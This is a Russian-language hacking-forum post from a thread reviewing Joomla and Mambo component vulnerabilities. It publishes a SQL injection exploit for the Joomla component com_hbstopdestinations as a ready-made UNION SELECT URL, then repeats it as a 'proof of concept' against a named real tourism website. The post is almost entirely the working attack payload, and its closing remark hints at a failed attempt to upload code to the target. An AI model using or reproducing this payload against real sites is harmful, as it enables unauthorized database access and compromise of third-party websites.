Форум АНТИЧАТ - Показать сообщение отдельно - Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Joomla com_hbstopdestinations SQL-inj

Joomla com_hbstopdestinations SQL-inj vuln

Этот компоненты специально для отелей, не очень популярен...

Exploit:

index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=

POC:

http://zambiatourismnews.com/index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=

Код не покажу, так как не залился)